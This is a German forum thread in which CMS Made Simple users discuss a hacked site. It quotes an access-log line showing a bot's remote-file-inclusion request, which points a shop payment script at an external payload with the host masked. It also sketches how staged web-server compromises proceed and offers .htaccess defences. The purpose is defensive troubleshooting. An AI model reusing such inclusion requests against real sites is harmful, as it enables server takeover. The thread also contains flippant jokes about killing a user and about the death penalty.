schon wieder Hack?

[NaN]

..., dann sollte man es besser jemandem überlassen, der sich damit auskennt oder sich das Wissen aneignen.

Hast schon recht mit Deinem "Rüffel". Jedoch ziehe ich mir diesen Schuh solange nicht an, bis ich weiß, ob es tatsächlich an meiner Unfähigkeit liegt.

Ich wollte Dir damit auch nichts unterstellen, sorry. Es klang nur so als hättest Du beim Umsetzen der Sicherheitshinweise Probleme gehabt. (wo ich keine sehe - aber wie gesagt, wenn man zu tief in der Materie drin steckt, ist es schwer es universell verständlich zu machen - was nicht heißt, dass ich davon wahnsinnig viel Ahnung habe )
Eigentlich wollte ich ja nur die Probleme wissen. Denn genau dazu ist dieses Forum unter anderem ja schließlich da - um Probleme zu lösen. Allerdings ist es manchmal eben recht frustrierend, wenn der Betreffende die Lösungsvorschläge auf grund mangeldem Grundwissens nicht versteht.
Mangelndes Grundwissen ist ja keine Schande. Nur leider wollen die wenigsten Forumbesucher etwas dazulernen und lieber einen kompletten Lösungsweg. D.h. andere müssen sich dann mit dem Problem eingehender befassen, wo die meisten doch wichtigeres zu tun hätten... ich schweife ab, sorry. Es ist 5 Uhr morgens und ich hatte noch keinen Schlaf. Man möge mir meine grobe ungehobelte Art verzeihen.

Gut, also "Unfähigkeit" scheint hier also nicht der Fall zu sein.

Nun könnte man ja meinen, ich hätte bei einem bereits gehackten System ein Update vorgenommen. Das kann ich hier und jetzt zwar nicht ausschließen - aber die Wahrscheinlichkeit ist eher gering - hatte ich doch erst die Version 1.2.5 neu installiert!

Auf einen leeren Webspace?
Oder einfach "drübergebügelt"?
Vielleicht war ja schon die Version davor betroffen.
Kann man dann leider schwer nachvollziehen.
Ich hatte schonmal geschrieben, dass man vor jedem Update, dass Sicherheitslücken behebt, prüfen soll, ob diese Sicherheitslücke nicht bereits ausgenutzt wurde.

Ich werde heute die Logfiles auswerten, vielleicht findet sich dort ein Hinweis.

Das Ergebnis wäre insbesondere dann interessant, wenn Du die 1.2.5 komlett neu aufgesetzt hattest (inkl. DB).

BTW: Weiß denn jemand, was sich hinter dem Code verbirgt?

Ich könnte es Dir sagen, aber danach müsste ich Dich töten... 
Nein, mal im ernst, ich weiß es nicht zu 100% (daher lasse ich Dich auch leben...  ) aber es sieht für mich so aus, als würden hochgeladene Dateien sofort ausgeführt werden. Das Script hält sich nicht damit auf, diese Dateien irgendwo zu speichern, sondern liest sie nach dem Upload aus dem temporären Verziechnis auf dem Server Deines Providers*) aus, speichert ihren Inhalt in einer Variable und führt diese Variable mit eval($code); einfach aus. Somit ist es völlig egal welche Dateizugriffsrechte auf Deinem Webspace herrschen, da der hochgeladene Code ja gar nicht erst bis dorthin kommt, sondern quasi "on-the-fly" bereits Schaden anrichten kann.

*) mehr Informationen zum Thema Datei-Upload gibts z.B. hier: http://www.php.net/manual/de/features.file-upload.php

ps: Ich habe Deinen Post mit dem Script mal zensiert, da das hier keine Anleitung zu irgendwelchen eventuell schädlichen Scripten sein soll. Anfragen zur Funktionsweise von irgendwelchen unerlaubt vorhandenen Scripten, die nicht zum CMS gehören sollten meiner Meinung nach lieber per Mail gestellt werden. Man weiß ja nie wer in diesem Forum unterwegs ist.

[symmetrix_01]

Hier meine vorläufigen Ergebnisse als Laie 

Ich vermute ebenfalls, da versuchen Kids irgendeinen Code in vorhandene Verzeichnisse zu implementieren. Wie komme ich drauf? Nun, nach Durchsicht meiner log-files fand ich folgendes:

Code: Select all

210.113.203.55 - - [03/Jul/2008:04:34:50 +0200] "GET /impressum/kontakt//shop/payment/EGold.php?payment_type=
http://--/--/--/sageichjetztnicht.txt??? HTTP/1.1" 404 10564 "-" "libwww-perl/5.79"

Alles, was nach kontakt/ kommt, müßte eigentlich einen 404 verursachen...
Hier gab es noch einen 404 - nur zwei Sekunden später jedoch einen 200 (insgesamt 6 Versuche). Natürlich habe ich mir diese txt-Datei angesehen - leider ist sie für mich kryptisch - da php.

Übrigens, die Datei sageichjetztnicht.txt heißt natürlich anders (und die "--" sollten eine Suche danach erschweren) - da mein vorhergender Post (wohl aus guten Gründen) zensiert wurde, möchte ich natürlich nicht zur Weiterverbreitung beitragen. Wer den Inhalt will, teilt mir bitte seine E-Mail mit.
Darüber hinaus habe ich explizit nach dieser txt im Web gesucht und siehe da, es gibt rund 1.800 Stellen, die Google bekannt sind. Die, welche ich aufrief, hatten den gleichen Inhalt.

In wie weit diese Datei mit den Veränderungen der CMCms Installation zu tun hat, kann ich nicht sagen. Ich fand jedenfalls in der fraglichen Zeit keinen 201!

Wen kann ich nun fragen - PHP-Coder?

[mike-r]

Das ist ein Klassiker, wo von Bots blind auf jede Menge Lücken aus (verschiedenen) CMSen getestet wird. Solange a: da nicht zufällig der Pfad auf ein (ungesichertes) CMSMS-Script angesprochen UND b: auch zufällig gleichzeitig der Schadcode für CMSMS geladen wird ist das relativ ungefährlich.

[NaN]

Ich vermute ebenfalls, da versuchen Kids irgendeinen Code in vorhandene Verzeichnisse zu implementieren.

Nun, als "Kids" würde ich die nicht bezeichnen.
Ich vermute mal stark, dass es sich bei der *sagichnicht*.txt um ähnliches handeln dürfte wie in diesem Thread:

http://forum.cmsmadesimple.org/index.ph ... 787.0.html

Das ist ein Klassiker, wo von Bots blind auf jede Menge Lücken aus (verschiedenen) CMSen getestet wird. Solange a: da nicht zufällig der Pfad auf ein (ungesichertes) CMSMS-Script angesprochen UND b: auch zufällig gleichzeitig der Schadcode für CMSMS geladen wird ist das relativ ungefährlich.

Bingo.
Seitdem ich ebenfalls die von symmetrix erwähnten "blah_dateiname.php"-Dateien auf meinem Server hatte, versucht ständig jemand auf diese Dateien zuzugreifen, was nicht funktioniert, weil sie a) nicht mehr da sind und b) PHPIDS das ganze sowieso bemängelt.
Die IP Adressen lassen sich zu Rechnern aus Frankreich zurückverfolgen.
Allerdings wechseln diese IP-Adressen mit nahezu identischen Anfragen an den Server in so kurzen Zeitabständen zu sehr weit voneinander entfernten Orten (Rouen, Paris, Marseille...), sodass ich nicht glaube, dass dort eine reale Person dahinter stecken kann.

Solche angriffe geschehen (ganz grob) immer in mehreren Stufen.

Erst wird (meist von einem Programm = Bot) blind versucht eine Sicherheitslücke auszunutzen. Dabei wird erstmal "harmloser" Code eingeschleust.
Dieser Schritt wird meist nicht als Angriff erkannt.
Vom Server nicht, weil es sich um eine reguläre Anfrage zu handeln scheint, die das System offenbar zulässt und ausführt.
Vom System sowieso nicht, weil es ja ein Leck hat.
Und vom Betreiber nur äußerst selten, weil der ja nicht ständig die Dateien auf dem Webspace überprüft.

Danach wird geprüft, ob der erste Schritt erfolgreich war.
Der eingeschleuste Code wird ausgeführt.
Als Ergebnis liefert der Code meist nur Server-Informationen.
Da nicht auf jedem Webspace eine phpinfo.php öffentlich bereitsteht, bietet sich der Code, der "on-the-fly" Scripte ausführen kann regelrecht an. Meist bieten diese Scripte noch weitaus mehr als phpinfo(); .
(Wenn keine Info kommt, war der erste Schritt nicht erfolgreich.)
Auch das wird in den meisten Fällen nicht als Angriff erkannt.
Server-Infos abzufragen ist ja nichts schlimmes.

Nach Auswertung der Server-Infos kann ein entsprechendes Script, das evtl. Sicherheitsbarrieren umgehen kann, auf den Server geladen werden.
Das kann ebenfalls automatisch erfolgen und wird wie beim ersten Schritt nicht als Angriff erkannt.
Das Script muss zudem nicht direkt auf den Webspace geladen werden, sondern kann bereits vorher ausgeführt werden.
Und jetzt wirds schlimm.
Dieses Script kann alles mögliche machen, was der Provider seinem Kunden erlaubt hat.
Also alles, was der Admin einer Seite machen darf.
Somit kann es seelenruhig noch bösartigere Scripte direkt ins root-Verzeichnis oder sonstwohin laden wo entsprechende Zugriffsrechte sind.
Denn dort hat man in der Regel öffentlichen Zugriff.

(Hier kann man mit einer .htacess-Datei die Zugriffe nur auf bestimmte Dateien vom CMS beschränken.
Dann kann das böse Script zwar auf dem Server sein, kann aber nicht ausgeführt werden.
Problem ist allerdings, dass man wirklich eine umfangreiche Liste aller CMS-Dateien zusammenstellen muss auf die man direkten Zugriff haben darf/muss. Man kann leider nicht immer einfach pauschal den direkten Zugriff auf Dateien in einem Verzeichnis verbieten. Ich finde eine solche Liste sollte von den Entwicklern bereits mitgeliefert werden. Die wissen ja in der Regel wie ihr CMS funktioniert.)

So, und nun ist es eigentlich schon zu spät. Wenn das ganzböse Script dann ausgeführt wird... Sense! Entweder merkt's der Provider selbst und kappt den Server vom Netz (hunderte Kunden, tausende Webseiten nicht mehr im Netz erreichbar! Millionen Internetsurfer frustriert...) oder der Server ist "kompromitiert" und bietet dann täglich Millionen Email-Postfächern Lebensversicherungen, Viagra, P3NI$-EN-LARGE-MENT, "Free*zensiert*access" zu Young*zensiert*Girls*zensiert*, *zensiert* *zensiert* *zensiert*... an.
Und natürlich wird er dann auch versuchen die bösen Scripte weiterzuverbreiten.
Kurz: er wird zu einem "Zombie-Rechner" oder anderes.

Im Übrigen bin ich für die Wiedereinführung der Todesstrafe... gegen Spamer & Co.